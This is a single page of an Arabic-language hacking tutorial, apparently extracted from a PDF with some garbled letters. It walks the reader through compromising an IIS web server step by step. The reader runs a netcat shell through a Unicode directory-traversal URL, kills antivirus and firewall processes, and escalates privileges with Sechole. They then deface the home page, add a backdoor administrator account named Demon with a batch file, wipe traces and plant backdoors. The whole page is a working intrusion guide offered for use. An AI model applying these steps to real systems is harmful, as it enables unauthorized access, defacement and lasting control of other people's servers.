Page 135 - بسم الله الرحمن الرحيم

P. 135

‫كل ما سبق كان عبارة عن مقدمه ‪ (:‬اما العمل الحقيقي سيبدأ الن ‪:‬‬

‫اول قم برفع جهميع الدوات السابق الى السيرفر ‪..‬‬
‫ثم قم بتشغيل ‪ ncx99.exe‬بهذا الشكل مثل ‪:‬‬

‫‪http://target/scripts/..À¯../winnt/system32/cmd1.exe?/c+C:\ncx99.exe‬‬
‫بعد ذلك قم بالتصصال بالموقع على البورت ‪.. 99‬‬

‫ستحصل على سطر اوامر ‪ CMD‬بدون امتيازات = ‪. Guest‬‬
‫الن قم بتشغيل الداة ‪ .. TLIST‬ستعرض لك جهميع العمليات التي تصعمل ‪ ..‬قم بالبحث عن رقم العملية ‪PID‬‬

‫الخاص بالنتي فايروس ان وجهد ‪ ..‬وكذلك اذا وجهدت جهدار ناري ‪..‬‬
‫سجل رقم ‪ PID‬الخاص بالنتي فايروس والفايروول على ورقه جهانبيه ‪..‬‬
‫الن قم بقتل الجهراء بالداة ‪ Kill‬بهذا الشكل ‪ .. KILL.exe PID :‬مكان ‪ PID‬تصضع رقم العملية ‪(:‬‬
‫يسأل البعض ! مالهدف من اقفال النتي فايروس ؟ الجهابة ‪ ..‬أن التحديثات الختيرة من انتي فايروس تصتعامل‬
‫مع ‪ Sechole‬على انه باكدور ‪ ..‬والن بعد اتصما‪.‬م العمليات السابقة بنجا ح ‪ ..‬قم بتشغيل‬

‫‪ (: Sechole.exe‬من المتصفح ‪.‬‬

‫عندها سيتم رفم امتيازات ‪ IWAM_USER‬الى مجموعه ‪.. Administrators‬‬
‫الن بإمكانك تصنفيذه جهميع الوامر بكامل الحريه وبدون اي مشاكل في الصلحيات ‪. Access Denided‬‬

‫وطبعا اهم شي الكتابة على الصفحه الرئيسية بامر اليكو ‪:‬‬
‫‪+C+Echo+Hacked+by+XDeMoNX‬‬
‫< ‪C;\inetpub\wwwroot\index+‬‬
‫‪htm.‬‬

‫ولكن ليس هذا كل شي ‪..‬‬
‫القراصنه الذكياء ل يبحثون فقط عن تصغيير الصفحه الرئيسية ختصوصا اذا كان الموقع مهم او يحتوي على‬

‫معلومات او قواعد بيانات ‪ ...‬إلخ ‪(:‬‬

‫سؤال ‪ :‬هل تصستطيع الدختول بهذا اليوزر ؟ ‪ IWAM_USER‬الى اي ختدمه مثل تصلنت او اف تصي بي ؟؟‬
‫الجهابة ‪ :‬ل ‪ ..‬صحيح اننا قمنا برفع امتيزاتصه لكننا ل نملك كلمه المرور ! لنه تصكون مسنده بشكل عشوائي ‪.‬‬

‫سيذهب تصفكير البعض الى الحصول على ملف السا‪.‬م وكسره ‪ (:‬هذا ممكن ‪ ..‬لكن يوجهد ماهو اسهل ‪.‬‬
‫بما اننا لدينا حساب مكافي لـ ‪ Administrator‬ولكننا ل نملك كلمة المرور ‪ .‬ما رأيك بإضافه يوزر جهديد‬

‫باسمك مع باسورد ختاصه بك مع امتيازات المدير ايضا !! ‪ (:‬قليل من الذكاء والتفكير ‪(:‬‬
‫قم بانشاء مستند نصي جهديد واضف السطر التالي ‪:‬‬

‫‪net user Demon pass /add && net localgroup administrators Demon /add‬‬
‫والن ‪ Save as‬واحفظها باسم ‪. add.bat‬‬

‫تصوضيح ‪ :‬ما فعلناه سابقا هو انشاء مجلد دفعاتصي يقو‪.‬م بانشاء يوزر جهديد ‪ Demon‬وكلمة مرور ‪Pass‬‬
‫واضافته الى مجموعة الدمنستريتورز ‪ (:‬المدراء ‪..‬‬

‫قم الن برفع الملف ‪ add.bat‬ثم تصشغيلها من المتصفح )بواسطة اليونكود(‬
‫الن لديك حساب مدير ‪ (:‬وتصستطيع الدختول الى اي ختدمه ‪ ..‬اف تصي بي او تصلنت او نت بيوس او غيرها ‪(:‬‬
‫ل تصنسى في النهاية مسح الثار واضافة البواب الخلية الخاصة بك لتسهيل الدختول في المرات القادمه ‪(:‬‬
‫طبعا لن اتصوسع في هذا الجانب لنه ) لكل شيخ طريقة!( وكل واحد له اسلوب في اختفاء ادواتصه والتحكم في‬

‫الملفات ‪.‬‬

‫نرجهع لنقطة سابقة ‪..‬‬
‫هل تصذكر اني طلبت منك اقفال الفايروول ؟؟ لماذا ؟‬
‫لو جهربت تصنفذ المر ‪ netstat -an‬من ختلل سطر اوامر الن سي ‪ ..‬فانك ستجد من المنافذ ما يسر‬

‫القلب ‪(:‬‬
‫‪ 90%‬من السيرفرات اللي دختلتها وكانت محمية بجدران نار ‪ (:‬وجهدت المنفذ ‪ 139‬فيها مفتوحا بدون حمايه‬

‫‪135‬‬

130 131 132 133 134 135 136 137 138 139 140